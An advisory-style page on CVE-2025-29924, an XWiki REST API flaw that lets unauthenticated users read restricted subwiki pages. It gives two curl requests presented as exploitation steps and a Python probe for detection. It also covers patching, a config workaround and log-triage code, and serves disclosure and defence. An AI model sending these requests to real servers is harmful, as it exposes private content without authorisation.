XWiki Platform, Access Control Bypass, CVE-2025-29924 (Critical)

How CVE-2025-29924 Works

This vulnerability is an improper access control flaw in XWiki's REST API that appears when a subwiki enables "Prevent unregistered users to view pages." Unauthenticated clients can read restricted pages by requesting them directly through the REST API, exposing private content. The root cause is a missing authorization check in the REST endpoints, so the subwiki's view restriction is enforced in the web UI but not on the API path. Affected versions are XWiki <15.10.14, <16.4.6, and versions before 16.10.0-rc-1.

DailyCVE Form

Platform: XWiki Platform
Version: <15.10.14
Vulnerability: Access Bypass
Severity: Critical
Date: 2025-03-19

What Undercode Says:

Exploitation

1. Detect Subwiki Config:

curl -X GET "http://target/subwiki/rest/wikis/xwiki/spaces" -H "Accept: application/json"

Check for `"isPrivate": true` in the response.

2. Bypass Access Control:

curl -X GET "http://target/subwiki/rest/wikis/xwiki/spaces/Main/pages/PrivatePage" -H "Accept: application/json"

Returns private page content if vulnerable.

Mitigation

1. Patch: Upgrade to XWiki 15.10.14, 16.4.6, or 16.10.0-rc-1.

2. Temporary Fix: Disable the REST API for subwikis in xwiki.cfg (a properties-style file, so comments start with `#`). Note that this also blocks legitimate REST clients until the instance is patched:

# xwiki.cfg
xwiki.rest.enabled=false

3. Log Monitoring:

grep "GET /rest/wikis" /var/log/xwiki/access.log
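The grep above only lists REST hits; during triage you usually want to narrow that to successful page-content reads made without a logged-in user and group them by client. The following is an added example (not part of the original advisory or of XWiki) that parses combined-format access-log lines from a reverse proxy in front of XWiki and flags anonymous 200 responses on `/rest/wikis/<wiki>/spaces/.../pages/<page>`. The sample log lines, hosts, and user name are constructed for this example. It assumes the remote-user field is populated by the proxy; on a plain XWiki deployment with form login that field stays `-` for everyone, in which case the script simply returns every successful REST page read in the window, which is still the set worth reviewing.

```python
import re
from collections import Counter

# Constructed sample access-log lines (combined log format, assumed to come from a
# reverse proxy in front of XWiki). Addresses, user and page names are invented.
SAMPLE_LOG = """\
203.0.113.10 - - [19/Mar/2025:10:01:02 +0000] "GET /rest/wikis/xwiki/spaces HTTP/1.1" 200 512 "-" "curl/8.4.0"
203.0.113.10 - - [19/Mar/2025:10:01:05 +0000] "GET /rest/wikis/xwiki/spaces/Main/pages/PrivatePage HTTP/1.1" 200 8192 "-" "curl/8.4.0"
198.51.100.7 - alice [19/Mar/2025:10:02:11 +0000] "GET /rest/wikis/xwiki/spaces/Main/pages/WebHome HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
203.0.113.10 - - [19/Mar/2025:10:03:00 +0000] "GET /bin/view/Main/WebHome HTTP/1.1" 302 0 "-" "curl/8.4.0"
203.0.113.22 - - [19/Mar/2025:10:04:00 +0000] "GET /rest/wikis/xwiki/spaces/Main/pages/Secret HTTP/1.1" 401 0 "-" "python-requests/2.31"
203.0.113.10 - - [19/Mar/2025:10:05:30 +0000] "GET /subwiki/rest/wikis/xwiki/spaces/HR/spaces/Payroll/pages/Q1 HTTP/1.1" 200 2048 "-" "curl/8.4.0"
"""

# Combined log format: ip ident user [timestamp] "METHOD path proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# REST page-content read. Searched rather than anchored so a servlet context
# prefix such as /xwiki or /subwiki is tolerated; nested spaces are kept whole.
REST_PAGE_RE = re.compile(
    r'/rest/wikis/(?P<wiki>[^/]+)/spaces/(?P<space>.+?)/pages/(?P<page>[^/?]+)'
)


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def is_suspicious(rec):
    """True for an anonymous client (user field '-') that got a 200 on a REST page read."""
    if rec is None or rec["method"] != "GET" or rec["status"] != 200:
        return False
    if rec["user"] != "-":
        return False
    return REST_PAGE_RE.search(rec["path"]) is not None


def scan(log_text):
    """Return (findings, per_ip) where findings are (ip, wiki, 'space/.../page') tuples."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if is_suspicious(rec):
            m = REST_PAGE_RE.search(rec["path"])
            findings.append((rec["ip"], m.group("wiki"), f'{m.group("space")}/{m.group("page")}'))
    per_ip = Counter(ip for ip, _, _ in findings)
    return findings, per_ip


if __name__ == "__main__":
    found, counts = scan(SAMPLE_LOG)
    for ip, wiki, page in found:
        print(f"{ip} read {page} in wiki {wiki} anonymously via REST")
    print("anonymous REST page reads per client:", dict(counts))
```

Only the two anonymous 200 responses on page paths are reported; the space listing, the authenticated read by `alice`, the UI redirect, and the request that was correctly refused with 401 are all ignored. Run it against the real log with `scan(open(path).read())` and review the listed pages against the subwiki's intended visibility.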

Detection Script (Python)

import requests

def check_cve_2025_29924(url, timeout=10):
    # Unauthenticated probe: list the spaces, then try to read a page without credentials.
    headers = {"Accept": "application/json"}
    try:
        r = requests.get(f"{url}/rest/wikis/xwiki/spaces", headers=headers, timeout=timeout)
        if r.status_code == 200 and "isPrivate" in r.text:
            r2 = requests.get(f"{url}/rest/wikis/xwiki/spaces/Main/pages/WebHome",
                              headers=headers, timeout=timeout)
            # A 200 on a restricted subwiki page without a session means the check is missing.
            return r2.status_code == 200
        return False
    except requests.RequestException:
        return False

Analytics

  • CVSS: 9.1 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)
  • Exploitability: Remote, no auth required.
  • Impact: Confidentiality breach.

References

Reported By: nvd.nist.gov
Extra Source Hub: Undercode
